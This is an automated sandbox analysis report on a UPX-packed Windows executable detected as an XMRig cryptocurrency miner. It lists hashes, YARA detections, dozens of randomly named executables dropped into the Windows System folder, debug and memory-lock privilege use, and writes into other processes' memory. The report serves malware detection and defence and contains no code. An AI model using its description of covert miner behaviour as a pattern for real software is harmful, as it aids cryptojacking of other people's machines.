xmrig | 793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08-03-2024 20:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
Size

1.8MB
MD5

0d7834c567eb995301ba70f2dcab7f6b
SHA1

8d7af5725005a57596fb2938d51d75055d2280cb
SHA256

793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045
SHA512

1b9e92cfe7deed58735411daa0e51a50014c31979085effd74a7eea9c72d8722702502bba61e10064ffed509bec68ae81a60bc7a4a719b4505c5c60440ead386
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4pCB2d:NABf

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 19 IoCs

resource	yara_rule
behavioral2/memory/4436-252-0x00007FF713F60000-0x00007FF714352000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3788-370-0x00007FF767F30000-0x00007FF768322000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4904-496-0x00007FF7F6BA0000-0x00007FF7F6F92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3888-503-0x00007FF705C90000-0x00007FF706082000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2964-506-0x00007FF6456F0000-0x00007FF645AE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-508-0x00007FF7592F0000-0x00007FF7596E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1644-1079-0x00007FF7463F0000-0x00007FF7467E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/8132-1945-0x00007FF7990A0000-0x00007FF799492000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3208-856-0x00007FF7A9B50000-0x00007FF7A9F42000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3232-509-0x00007FF692150000-0x00007FF692542000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2784-507-0x00007FF710480000-0x00007FF710872000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4444-505-0x00007FF740D50000-0x00007FF741142000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4972-504-0x00007FF601B10000-0x00007FF601F02000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1780-502-0x00007FF698800000-0x00007FF698BF2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3624-501-0x00007FF63F030000-0x00007FF63F422000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3956-201-0x00007FF640CD0000-0x00007FF6410C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2596-138-0x00007FF7BAC50000-0x00007FF7BB042000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3792-87-0x00007FF61C8A0000-0x00007FF61CC92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1152-20-0x00007FF60B830000-0x00007FF60BC22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/2940-0-0x00007FF77C340000-0x00007FF77C732000-memory.dmp	UPX
behavioral2/files/0x00080000000231fd-5.dat	UPX
behavioral2/files/0x0007000000023210-61.dat	UPX
behavioral2/files/0x000700000002320d-101.dat	UPX
behavioral2/files/0x0007000000023220-149.dat	UPX
behavioral2/files/0x0007000000023213-222.dat	UPX
behavioral2/memory/4436-252-0x00007FF713F60000-0x00007FF714352000-memory.dmp	UPX
behavioral2/memory/3788-370-0x00007FF767F30000-0x00007FF768322000-memory.dmp	UPX
behavioral2/memory/4904-496-0x00007FF7F6BA0000-0x00007FF7F6F92000-memory.dmp	UPX
behavioral2/memory/3888-503-0x00007FF705C90000-0x00007FF706082000-memory.dmp	UPX
behavioral2/memory/2964-506-0x00007FF6456F0000-0x00007FF645AE2000-memory.dmp	UPX
behavioral2/memory/4876-508-0x00007FF7592F0000-0x00007FF7596E2000-memory.dmp	UPX
behavioral2/memory/1644-1079-0x00007FF7463F0000-0x00007FF7467E2000-memory.dmp	UPX
behavioral2/memory/4940-1750-0x00007FF67A110000-0x00007FF67A502000-memory.dmp	UPX
behavioral2/memory/9612-1909-0x00007FF64D850000-0x00007FF64DC42000-memory.dmp	UPX
behavioral2/memory/10448-1924-0x00007FF657240000-0x00007FF657632000-memory.dmp	UPX
behavioral2/memory/10544-1933-0x00007FF742760000-0x00007FF742B52000-memory.dmp	UPX
behavioral2/memory/7756-1946-0x00007FF7847F0000-0x00007FF784BE2000-memory.dmp	UPX
behavioral2/memory/6352-2002-0x00007FF69CC30000-0x00007FF69D022000-memory.dmp	UPX
behavioral2/memory/7772-2001-0x00007FF624A30000-0x00007FF624E22000-memory.dmp	UPX
behavioral2/memory/5984-1983-0x00007FF6826D0000-0x00007FF682AC2000-memory.dmp	UPX
behavioral2/memory/8020-1969-0x00007FF625260000-0x00007FF625652000-memory.dmp	UPX
behavioral2/memory/5260-1961-0x00007FF6E92C0000-0x00007FF6E96B2000-memory.dmp	UPX
behavioral2/memory/6012-1953-0x00007FF7761D0000-0x00007FF7765C2000-memory.dmp	UPX
behavioral2/memory/8132-1945-0x00007FF7990A0000-0x00007FF799492000-memory.dmp	UPX
behavioral2/memory/7328-1944-0x00007FF6FE5D0000-0x00007FF6FE9C2000-memory.dmp	UPX
behavioral2/memory/5444-1976-0x00007FF785DE0000-0x00007FF7861D2000-memory.dmp	UPX
behavioral2/memory/12184-1941-0x00007FF6564A0000-0x00007FF656892000-memory.dmp	UPX
behavioral2/memory/8632-1939-0x00007FF667F70000-0x00007FF668362000-memory.dmp	UPX
behavioral2/memory/10672-1938-0x00007FF603C30000-0x00007FF604022000-memory.dmp	UPX
behavioral2/memory/10408-1942-0x00007FF6C9510000-0x00007FF6C9902000-memory.dmp	UPX
behavioral2/memory/10728-1937-0x00007FF793760000-0x00007FF793B52000-memory.dmp	UPX
behavioral2/memory/9688-1922-0x00007FF660110000-0x00007FF660502000-memory.dmp	UPX
behavioral2/memory/9720-1921-0x00007FF7006C0000-0x00007FF700AB2000-memory.dmp	UPX
behavioral2/memory/5244-1912-0x00007FF7A2BA0000-0x00007FF7A2F92000-memory.dmp	UPX
behavioral2/memory/8068-1883-0x00007FF62F650000-0x00007FF62FA42000-memory.dmp	UPX
behavioral2/memory/452-1902-0x00007FF7B14C0000-0x00007FF7B18B2000-memory.dmp	UPX
behavioral2/memory/7768-1879-0x00007FF720300000-0x00007FF7206F2000-memory.dmp	UPX
behavioral2/memory/6572-1882-0x00007FF7A33D0000-0x00007FF7A37C2000-memory.dmp	UPX
behavioral2/memory/6816-1835-0x00007FF64F040000-0x00007FF64F432000-memory.dmp	UPX
behavioral2/memory/11136-1808-0x00007FF6A4C30000-0x00007FF6A5022000-memory.dmp	UPX
behavioral2/memory/6360-1809-0x00007FF65DC60000-0x00007FF65E052000-memory.dmp	UPX
behavioral2/memory/11504-1807-0x00007FF7D3430000-0x00007FF7D3822000-memory.dmp	UPX
behavioral2/memory/7660-1802-0x00007FF6402F0000-0x00007FF6406E2000-memory.dmp	UPX
behavioral2/memory/3752-1777-0x00007FF71D210000-0x00007FF71D602000-memory.dmp	UPX
behavioral2/memory/6576-1775-0x00007FF6F5DD0000-0x00007FF6F61C2000-memory.dmp	UPX
behavioral2/memory/7456-1774-0x00007FF7CA090000-0x00007FF7CA482000-memory.dmp	UPX
behavioral2/memory/7608-1759-0x00007FF758BC0000-0x00007FF758FB2000-memory.dmp	UPX
behavioral2/memory/5520-1764-0x00007FF6E73F0000-0x00007FF6E77E2000-memory.dmp	UPX
behavioral2/memory/7248-1738-0x00007FF642410000-0x00007FF642802000-memory.dmp	UPX
behavioral2/memory/6860-1731-0x00007FF791990000-0x00007FF791D82000-memory.dmp	UPX
behavioral2/memory/6096-1739-0x00007FF7CEDE0000-0x00007FF7CF1D2000-memory.dmp	UPX
behavioral2/memory/5524-1728-0x00007FF75F760000-0x00007FF75FB52000-memory.dmp	UPX
behavioral2/memory/716-1727-0x00007FF7B6AD0000-0x00007FF7B6EC2000-memory.dmp	UPX
behavioral2/memory/6400-1673-0x00007FF782EC0000-0x00007FF7832B2000-memory.dmp	UPX
behavioral2/memory/6116-1667-0x00007FF6F7760000-0x00007FF6F7B52000-memory.dmp	UPX
behavioral2/memory/7344-1705-0x00007FF6A5DC0000-0x00007FF6A61B2000-memory.dmp	UPX
behavioral2/memory/3208-856-0x00007FF7A9B50000-0x00007FF7A9F42000-memory.dmp	UPX
behavioral2/memory/3232-509-0x00007FF692150000-0x00007FF692542000-memory.dmp	UPX
behavioral2/memory/2784-507-0x00007FF710480000-0x00007FF710872000-memory.dmp	UPX
behavioral2/memory/4444-505-0x00007FF740D50000-0x00007FF741142000-memory.dmp	UPX
behavioral2/memory/4972-504-0x00007FF601B10000-0x00007FF601F02000-memory.dmp	UPX
behavioral2/memory/1780-502-0x00007FF698800000-0x00007FF698BF2000-memory.dmp	UPX
behavioral2/memory/3624-501-0x00007FF63F030000-0x00007FF63F422000-memory.dmp	UPX

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral2/memory/4436-252-0x00007FF713F60000-0x00007FF714352000-memory.dmp	xmrig
behavioral2/memory/3788-370-0x00007FF767F30000-0x00007FF768322000-memory.dmp	xmrig
behavioral2/memory/4904-496-0x00007FF7F6BA0000-0x00007FF7F6F92000-memory.dmp	xmrig
behavioral2/memory/3888-503-0x00007FF705C90000-0x00007FF706082000-memory.dmp	xmrig
behavioral2/memory/2964-506-0x00007FF6456F0000-0x00007FF645AE2000-memory.dmp	xmrig
behavioral2/memory/4876-508-0x00007FF7592F0000-0x00007FF7596E2000-memory.dmp	xmrig
behavioral2/memory/1644-1079-0x00007FF7463F0000-0x00007FF7467E2000-memory.dmp	xmrig
behavioral2/memory/8132-1945-0x00007FF7990A0000-0x00007FF799492000-memory.dmp	xmrig
behavioral2/memory/3208-856-0x00007FF7A9B50000-0x00007FF7A9F42000-memory.dmp	xmrig
behavioral2/memory/3232-509-0x00007FF692150000-0x00007FF692542000-memory.dmp	xmrig
behavioral2/memory/2784-507-0x00007FF710480000-0x00007FF710872000-memory.dmp	xmrig
behavioral2/memory/4444-505-0x00007FF740D50000-0x00007FF741142000-memory.dmp	xmrig
behavioral2/memory/4972-504-0x00007FF601B10000-0x00007FF601F02000-memory.dmp	xmrig
behavioral2/memory/1780-502-0x00007FF698800000-0x00007FF698BF2000-memory.dmp	xmrig
behavioral2/memory/3624-501-0x00007FF63F030000-0x00007FF63F422000-memory.dmp	xmrig
behavioral2/memory/3956-201-0x00007FF640CD0000-0x00007FF6410C2000-memory.dmp	xmrig
behavioral2/memory/2596-138-0x00007FF7BAC50000-0x00007FF7BB042000-memory.dmp	xmrig
behavioral2/memory/3792-87-0x00007FF61C8A0000-0x00007FF61CC92000-memory.dmp	xmrig
behavioral2/memory/1152-20-0x00007FF60B830000-0x00007FF60BC22000-memory.dmp	xmrig

Executes dropped EXE 64 IoCs

pid	Process
1152	BYSvCrv.exe
1364	WIcbOIM.exe
1756	IuQqZwg.exe
3792	KlafKPK.exe
2596	hZGmCZV.exe
3956	xCgiJvS.exe
4436	wiXQZVR.exe
3788	JRhHLhc.exe
4904	UirFkav.exe
3624	gBjAMSI.exe
684	WSABEQt.exe
1780	fqkzjqJ.exe
3888	YwSxbcs.exe
4972	oqstFyr.exe
4444	JmrQcow.exe
2964	utspRFP.exe
2784	MmQHTjh.exe
2548	SjaGryN.exe
4876	gHMctdz.exe
3232	xWRpzMF.exe
3208	cIUQHlS.exe
1644	WLauuQk.exe
4364	AwbFKAC.exe
4692	JhlHpJF.exe
3784	LzIbubZ.exe
620	gkSVebj.exe
3284	xxWWioL.exe
4992	yPYZjlq.exe
2668	IXvlqss.exe
3444	CZpmYNo.exe
4220	QEojhEC.exe
2464	vmrWDRV.exe
3036	aADSxfK.exe
2592	vYCSDQF.exe
1420	xlmNVYQ.exe
2712	sNtsjPg.exe
1068	WYndaRn.exe
8	baPVekO.exe
4708	lughWxT.exe
3740	lcXUORy.exe
4840	YHbNfza.exe
1132	kRXTShu.exe
4116	XEssNqu.exe
3068	mUdQGcz.exe
3292	qIcNJmb.exe
2476	lUzEFJq.exe
3348	McUzQRw.exe
2300	CayZTVu.exe
436	IXMkCvX.exe
4460	ChijmuS.exe
4568	gNxeLPh.exe
3312	yRuIfDP.exe
1852	SlLOASi.exe
4792	YzzSjYG.exe
4788	okBcBIe.exe
3244	gOOkhfU.exe
3584	folxoad.exe
3040	bcoaQiS.exe
4908	JHvsrLR.exe
1800	QoAGxIu.exe
1440	muyzQkZ.exe
384	yIeAeOn.exe
4352	VJhrJXD.exe
4168	OGkOWQe.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2940-0-0x00007FF77C340000-0x00007FF77C732000-memory.dmp	upx
behavioral2/files/0x00080000000231fd-5.dat	upx
behavioral2/files/0x0007000000023210-61.dat	upx
behavioral2/files/0x000700000002320d-101.dat	upx
behavioral2/files/0x0007000000023220-149.dat	upx
behavioral2/files/0x0007000000023213-222.dat	upx
behavioral2/memory/4436-252-0x00007FF713F60000-0x00007FF714352000-memory.dmp	upx
behavioral2/memory/3788-370-0x00007FF767F30000-0x00007FF768322000-memory.dmp	upx
behavioral2/memory/4904-496-0x00007FF7F6BA0000-0x00007FF7F6F92000-memory.dmp	upx
behavioral2/memory/3888-503-0x00007FF705C90000-0x00007FF706082000-memory.dmp	upx
behavioral2/memory/2964-506-0x00007FF6456F0000-0x00007FF645AE2000-memory.dmp	upx
behavioral2/memory/4876-508-0x00007FF7592F0000-0x00007FF7596E2000-memory.dmp	upx
behavioral2/memory/1644-1079-0x00007FF7463F0000-0x00007FF7467E2000-memory.dmp	upx
behavioral2/memory/4940-1750-0x00007FF67A110000-0x00007FF67A502000-memory.dmp	upx
behavioral2/memory/9612-1909-0x00007FF64D850000-0x00007FF64DC42000-memory.dmp	upx
behavioral2/memory/10448-1924-0x00007FF657240000-0x00007FF657632000-memory.dmp	upx
behavioral2/memory/10544-1933-0x00007FF742760000-0x00007FF742B52000-memory.dmp	upx
behavioral2/memory/7756-1946-0x00007FF7847F0000-0x00007FF784BE2000-memory.dmp	upx
behavioral2/memory/6352-2002-0x00007FF69CC30000-0x00007FF69D022000-memory.dmp	upx
behavioral2/memory/7772-2001-0x00007FF624A30000-0x00007FF624E22000-memory.dmp	upx
behavioral2/memory/5984-1983-0x00007FF6826D0000-0x00007FF682AC2000-memory.dmp	upx
behavioral2/memory/8020-1969-0x00007FF625260000-0x00007FF625652000-memory.dmp	upx
behavioral2/memory/5260-1961-0x00007FF6E92C0000-0x00007FF6E96B2000-memory.dmp	upx
behavioral2/memory/6012-1953-0x00007FF7761D0000-0x00007FF7765C2000-memory.dmp	upx
behavioral2/memory/8132-1945-0x00007FF7990A0000-0x00007FF799492000-memory.dmp	upx
behavioral2/memory/7328-1944-0x00007FF6FE5D0000-0x00007FF6FE9C2000-memory.dmp	upx
behavioral2/memory/5444-1976-0x00007FF785DE0000-0x00007FF7861D2000-memory.dmp	upx
behavioral2/memory/12184-1941-0x00007FF6564A0000-0x00007FF656892000-memory.dmp	upx
behavioral2/memory/8632-1939-0x00007FF667F70000-0x00007FF668362000-memory.dmp	upx
behavioral2/memory/10672-1938-0x00007FF603C30000-0x00007FF604022000-memory.dmp	upx
behavioral2/memory/10408-1942-0x00007FF6C9510000-0x00007FF6C9902000-memory.dmp	upx
behavioral2/memory/10728-1937-0x00007FF793760000-0x00007FF793B52000-memory.dmp	upx
behavioral2/memory/9688-1922-0x00007FF660110000-0x00007FF660502000-memory.dmp	upx
behavioral2/memory/9720-1921-0x00007FF7006C0000-0x00007FF700AB2000-memory.dmp	upx
behavioral2/memory/5244-1912-0x00007FF7A2BA0000-0x00007FF7A2F92000-memory.dmp	upx
behavioral2/memory/8068-1883-0x00007FF62F650000-0x00007FF62FA42000-memory.dmp	upx
behavioral2/memory/452-1902-0x00007FF7B14C0000-0x00007FF7B18B2000-memory.dmp	upx
behavioral2/memory/7768-1879-0x00007FF720300000-0x00007FF7206F2000-memory.dmp	upx
behavioral2/memory/6572-1882-0x00007FF7A33D0000-0x00007FF7A37C2000-memory.dmp	upx
behavioral2/memory/6816-1835-0x00007FF64F040000-0x00007FF64F432000-memory.dmp	upx
behavioral2/memory/11136-1808-0x00007FF6A4C30000-0x00007FF6A5022000-memory.dmp	upx
behavioral2/memory/6360-1809-0x00007FF65DC60000-0x00007FF65E052000-memory.dmp	upx
behavioral2/memory/11504-1807-0x00007FF7D3430000-0x00007FF7D3822000-memory.dmp	upx
behavioral2/memory/7660-1802-0x00007FF6402F0000-0x00007FF6406E2000-memory.dmp	upx
behavioral2/memory/3752-1777-0x00007FF71D210000-0x00007FF71D602000-memory.dmp	upx
behavioral2/memory/6576-1775-0x00007FF6F5DD0000-0x00007FF6F61C2000-memory.dmp	upx
behavioral2/memory/7456-1774-0x00007FF7CA090000-0x00007FF7CA482000-memory.dmp	upx
behavioral2/memory/7608-1759-0x00007FF758BC0000-0x00007FF758FB2000-memory.dmp	upx
behavioral2/memory/5520-1764-0x00007FF6E73F0000-0x00007FF6E77E2000-memory.dmp	upx
behavioral2/memory/7248-1738-0x00007FF642410000-0x00007FF642802000-memory.dmp	upx
behavioral2/memory/6860-1731-0x00007FF791990000-0x00007FF791D82000-memory.dmp	upx
behavioral2/memory/6096-1739-0x00007FF7CEDE0000-0x00007FF7CF1D2000-memory.dmp	upx
behavioral2/memory/5524-1728-0x00007FF75F760000-0x00007FF75FB52000-memory.dmp	upx
behavioral2/memory/716-1727-0x00007FF7B6AD0000-0x00007FF7B6EC2000-memory.dmp	upx
behavioral2/memory/6400-1673-0x00007FF782EC0000-0x00007FF7832B2000-memory.dmp	upx
behavioral2/memory/6116-1667-0x00007FF6F7760000-0x00007FF6F7B52000-memory.dmp	upx
behavioral2/memory/7344-1705-0x00007FF6A5DC0000-0x00007FF6A61B2000-memory.dmp	upx
behavioral2/memory/3208-856-0x00007FF7A9B50000-0x00007FF7A9F42000-memory.dmp	upx
behavioral2/memory/3232-509-0x00007FF692150000-0x00007FF692542000-memory.dmp	upx
behavioral2/memory/2784-507-0x00007FF710480000-0x00007FF710872000-memory.dmp	upx
behavioral2/memory/4444-505-0x00007FF740D50000-0x00007FF741142000-memory.dmp	upx
behavioral2/memory/4972-504-0x00007FF601B10000-0x00007FF601F02000-memory.dmp	upx
behavioral2/memory/1780-502-0x00007FF698800000-0x00007FF698BF2000-memory.dmp	upx
behavioral2/memory/3624-501-0x00007FF63F030000-0x00007FF63F422000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\MRdworo.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\RhOfaSL.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\MrHjBFz.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\FWSiPNk.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\vYFGxEB.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\OQAXqLk.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\bgXxNUI.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\iSqOYua.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\vMtINWd.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\amfCyKb.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\iyusRsi.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\hVZwvss.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\JvEzwKS.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\oUQPYge.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\CbsJcXQ.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\bODpscq.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\kSwGpSE.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\wCpvzkN.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\njLpafZ.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\XiayqcH.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\HXzKNqU.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\KVzveTn.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\wVNfsiX.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\PLiHhBF.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\mnRrLde.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\ShJlgqB.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\OCZJMbw.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\UxJncWy.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\wwornvQ.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\OJWcTfw.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\DhTrKWk.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\OrgTmSV.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\niTpSNM.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\yxlIQuL.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\awEcplu.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\BdPtMMZ.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\cTfXpbb.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\myyqnZX.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\cMInvwT.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\JYBuuYD.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\UXAEIgc.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\iihzIrq.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\MiFzOaa.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\aNKfodn.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\sTOyqxM.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\hnOYrci.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\JmBugqF.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\PawSMTM.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\LpctSbe.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\GAuApaX.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\HaUPeWB.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\kdfrNTg.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\siXBaPR.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\vlhDBUL.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\KRdhZOz.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\pNwtOag.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\duARQge.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\EcYbyBw.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\mTxTjdv.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\emAqdYR.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\XShAHkV.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\Fuicikb.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\jSvttrt.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
File created	C:\Windows\System\RSlgpth.exe	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4928	powershell.exe
4928	powershell.exe
9620	powershell.exe
9620	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
Token: SeLockMemoryPrivilege	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	9620	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2940 wrote to memory of 4928	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	90
PID 2940 wrote to memory of 4928	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	90
PID 2940 wrote to memory of 1152	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	91
PID 2940 wrote to memory of 1152	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	91
PID 2940 wrote to memory of 1364	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	92
PID 2940 wrote to memory of 1364	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	92
PID 2940 wrote to memory of 3956	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	93
PID 2940 wrote to memory of 3956	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	93
PID 2940 wrote to memory of 1756	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	94
PID 2940 wrote to memory of 1756	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	94
PID 2940 wrote to memory of 3792	2940	793c05d47dad4dd4530edaea28eadf70416b33f663a017598886cb1b6101d045.exe	95
